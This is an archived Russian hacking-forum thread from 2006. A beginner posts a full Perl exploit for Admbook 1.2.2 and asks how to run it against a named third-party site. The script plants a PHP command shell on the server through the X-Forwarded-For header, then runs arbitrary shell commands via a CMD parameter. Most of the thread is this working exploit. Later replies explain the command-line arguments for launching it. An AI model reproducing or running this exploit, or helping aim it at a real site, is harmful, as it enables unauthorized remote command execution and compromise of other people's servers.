Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Помогите с xploit.pl!!

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Помогите с xploit.pl!!
Имя
Сообщение << Старые топики   Новые топики >>
Помогите с xploit.pl!! - 2006-11-22 18:36:17.373333   
KaRaPuZik

Сообщений: 14
Оценки: 0
Присоединился: 2006-10-12 17:15:00.700000
Помогите скомпилировать Х'плоит например есть сайт
bookin.com на нём установлена Admbook 1.2.2 на которую у меня заготовлен Х'плоит
каталог где она установлена \book\
Вот и долгожданный X'ploit
++++++++++++++++++++++++++++++++++++++++++++++++++

#!/usr/bin/perl -w
use IO::Socket;

print "*************************************************************************\r\n";
print "| Admbook &lt;=1.2.2 X-Forwarded-For cmmnds xctn xploit |\r\n";
print "| By rgod rgod&lt;AT&gt;autistici&lt;DOT&gt;org |\r\n";
print "| site: http://retrogod.altervista.org |\r\n";
print "| |\r\n";
print "| Sun-Tzu: \"Rouse him, and learn the principle of his activity or |\r\n";
print "| inactivity. Force him to reveal himself, so as to find out his |\r\n";
print "| vulnerable spots.\" |\r\n";
print "*************************************************************************\r\n";
print "| dork: intitle:admbook intitle:version filetype:php |\r\n";
print "*************************************************************************\r\n";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}

$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i&lt;=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV &lt; 3)
{
print "Usage:\r\n";
print "perl admbook_122_xpl.pl SERVER PATH COMMAND\r\n\r\n";
print "SERVER - Server where AdmBook is installed.\r\n";
print "PATH - Path to AdmBook (ex: /admbook/ or just /) \r\n";
print "COMMAND - A shell command \r\n";
print "Example:\r\n";
print "perl admbook_122_xpl.pl localhost /admbook/ ls -la\r\n";
exit();
}

$sock = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$serv", Timeout =&gt; 10, PeerPort=&gt;"http(80)")
or die "[+] Connecting … Could not connect to host.\n\n";

$SHELL='";if (isset($_GET[CMD])){ECHO"Hi Master!";INI_SET("max_execution_time",0);PASSTHRU($_GET[CMD]);DIE;}echo"';
$data="page=1";
$data.="&name=whoami";
$data.="&url=";
$data.="&email=whoami\@SUNTZU.COM";
$data.="&icq=";
$message=urlEncode("I love italian guys!");
$data.="&message=".$message;
print $sock "POST ".$path."write.php HTTP/1.1\r\n";
print $sock "Referer: http://".$serv.$path."index.php\r\n";
print $sock "X-Forwarded-For: GUESS_WHAT:".$SHELL."\r\n";
print $sock "Content-Type: application/x-www-form-urlencoded\r\n";
print $sock "User-Agent: sun-tzu\r\n";
print $sock "Content-Length: ".length($data)."\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Connection: Close\r\n\r\n";
print $sock $data;
close($sock);

sleep(2);

$sock = IO::Socket::INET-&gt;new(Proto=&gt;"tcp", PeerAddr=&gt;"$serv", Timeout =&gt; 10, PeerPort=&gt;"http(80)")
or die "[+] Connecting … Could not connect to host.\n\n";

print $sock "GET ".$path."content-data.php?CMD=".$cmd." HTTP/1.1\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Connection: close\r\n\r\n";

while ($answer = &lt;$sock&gt;) {
print $answer;
}
close($sock);

# milw0rm.com [2006-02-19]
++++++++++++++++++++++++++++++++++++++
Помогите ????!!!!)))
Post #: 1
RE: Помогите с xploit.pl!! - 2006-11-22 18:39:03.433333   
j0ker_

Сообщений: 609
Оценки: 0
Присоединился: 2005-03-07 15:09:25
А компилировать то зачем, Perl - скриптовый язык
Post #: 2
RE: Помогите с xploit.pl!! - 2006-11-22 18:44:48.200000   
KaRaPuZik

Сообщений: 14
Оценки: 0
Присоединился: 2006-10-12 17:15:00.700000
НУ всмысле превести к красивому виду …. тоесть заменить некоторые строчки ентого кода на те строчки котторые надо)))))
Post #: 3
RE: Помогите с xploit.pl!! - 2006-11-22 18:51:18.793333   
j0ker_

Сообщений: 609
Оценки: 0
Присоединился: 2005-03-07 15:09:25
А зачем заменять то? Ты наверно параметры не правильно пишишь
Post #: 4
RE: Помогите с xploit.pl!! - 2006-11-22 19:10:07.263333   
KaRaPuZik

Сообщений: 14
Оценки: 0
Присоединился: 2006-10-12 17:15:00.700000
Ну вот параметры то мне надо и красиво прописать ……
Чтоб ентота таксказать прога на Перле работала на bookin.com
Post #: 5
RE: Помогите с xploit.pl!! - 2006-11-22 19:21:01.123333   
MindGame

Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
С какими параметрами ты  сплойт запускаешь?
Post #: 6
RE: Помогите с xploit.pl!! - 2006-11-22 19:34:52.870000   
KaRaPuZik

Сообщений: 14
Оценки: 0
Присоединился: 2006-10-12 17:15:00.700000
Я вообще без параметров запускаюсь ….. Я для ентого к вам и обращаюсь чтоб продиктовать кодик полностью ….
Post #: 7
RE: Помогите с xploit.pl!! - 2006-11-22 19:44:37.870000   
illich

Сообщений: 342
Оценки: 0
Присоединился: 2004-12-14 21:34:35
xploit.pl http://имя сайта /папка/ ls -la
Post #: 8
RE: Помогите с xploit.pl!! - 2006-11-22 20:28:55.420000   
KaRaPuZik

Сообщений: 14
Оценки: 0
Присоединился: 2006-10-12 17:15:00.700000
Вот так вот чтоли run xploit.pl http://имя сайта /папка/ ls -la
Post #: 9
RE: Помогите с xploit.pl!! - 2006-11-22 23:22:23.810000   
MindGame

Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
2KaRaPuZik
так, с гопа, ничего не получится у тебя, почитай FAQ для начала http://lex-voodoo.nm.ru/faq
Post #: 10
Страниц:  [1]
Все форумы >> [Для начинающих] >> Помогите с xploit.pl!!







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.